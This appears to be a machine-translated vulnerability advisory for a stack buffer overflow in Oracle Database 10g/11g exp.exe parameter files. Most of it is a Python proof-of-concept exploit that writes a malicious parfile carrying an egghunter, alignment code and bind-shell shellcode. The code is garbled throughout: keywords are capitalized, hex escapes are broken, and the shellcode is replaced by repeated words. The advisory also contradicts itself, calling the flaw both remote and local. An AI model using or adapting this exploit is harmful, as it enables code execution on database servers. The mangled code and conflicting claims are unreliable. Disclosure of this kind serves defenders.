Remote buffer overflow vulnerability in Oracle Database Export exp.exe Parameters

Remote buffer overflow vulnerability in Oracle Database Export exp.exe Parameters

Remote buffer overflow vulnerability in Oracle Database "exp.exe" parameter files

Release date:
Updated on:

Affected Systems:
Oracle 10g
Oracle Oracle11g
Description:
--------------------------------------------------------------------------------
Bugtraq id: 46376

Oracle Database is a relational Database management system of Oracle.

Oracle Database has a remote stack buffer overflow vulnerability when verifying user data. Attackers can exploit this vulnerability to execute arbitrary code in affected applications, resulting in DOS.

This vulnerability is located in the "file" field in the parameter file specified on the command line of the Oracle Export program.

<* Source: Steven Seeley (seeleymagic@hotmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Steven Seeley (seeleymagic@hotmail.com) provides the following test methods:

#! /Usr/bin/python
# Oracle 10/11g exp.exe-param file Local Buffer Overflow PoC Exploit
# Date found approx: 9/3/2010
# Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html
# Version: 10.x and 11g r1 (r2 untested)
# Tested on: Windows XP SP3 En
# Usage:
# $ ORACLE_HOME \ exp.exe system parfile1_overflow_oracle_exp.txt

Def banner ():
Print "\ n \ t | ------------------------------------- |"
Print "\ t | Oracle exp.exe code execution explo! T |"
Print "\ t | by mr_me-net-ninja.net ------------ | \ n"

Header = ("\ x69 \ x6E \ x64 \ x65 \ x78 \ x65 \ x73 \ x3D \ x6E \ x0D \ x0A \ x6C \ x6F \ x67 \ x3D \ x72 \ x65 \ x73 \ x75"
"\ X6C \ x74 \ x73 \ x2E \ x74 \ x78 \ x74 \ x0D \ x0A \ x66 \ x69 \ x6C \ x65 \ x3D ");

# Aligned to edx
Egghunter = ("Courier"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA ");

# Bind shell on port 4444, alpha3 encoded and aligned with edi
SC = ("success"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"60O0N0P0L0B0N0B060C0U0O0O0H0M0O0O0B0M0ZKPA ")

# Align edx
# Mov edx, ESP
# Sub edx, 64
# Sub edx, 64
# Sub edx, 64
# Sub edx, 32
# Sub edx, 64
# JMP EDX
Align = ("\ x8b \ xd4 \ x83 \ xea \ x64 \ x83 \ xea \ x64 \ x83"
"\ Xea \ x64 \ x83 \ xea \ x32 \ x83 \ xea \ x64 \ xff \ xe2 \ x43 ");

Exploit = header
Exploit + = "\ x43" * 39
Exploit + = align
Exploit + = egghunter
Exploit + = "\ x41" * (533-len (exploit ))
Exploit + = "\ xe9 \ x2a \ xfe \ xff"
Exploit + = "\ xbb \ x8b \ xe2 \ x61"
Exploit + = "\ xeb \ xf5"
Exploit + = "\ x41" x 100
Exploit + = "\ x57 \ x30 \ x30 \ x54" * 2
Exploit + = SC
Exploit + = "\ x43" * (6000-len (exploit ))
Exploit + = ". dmp"
Banner ()
Print ("[+] Shellcode byte size: % s" % (len (SC )))
Print ("[+] Writing % s bytes of exploit code to param file" % (len (exploit )))
Pwnfile = open('overflow_oracle_exp.txt ', 'w ');
Pwnfile. write (exploit );
Pwnfile. close ()
Print "[+] Exploit overflow_oracle_exp.txt file created! "

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Oracle
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.oracle.com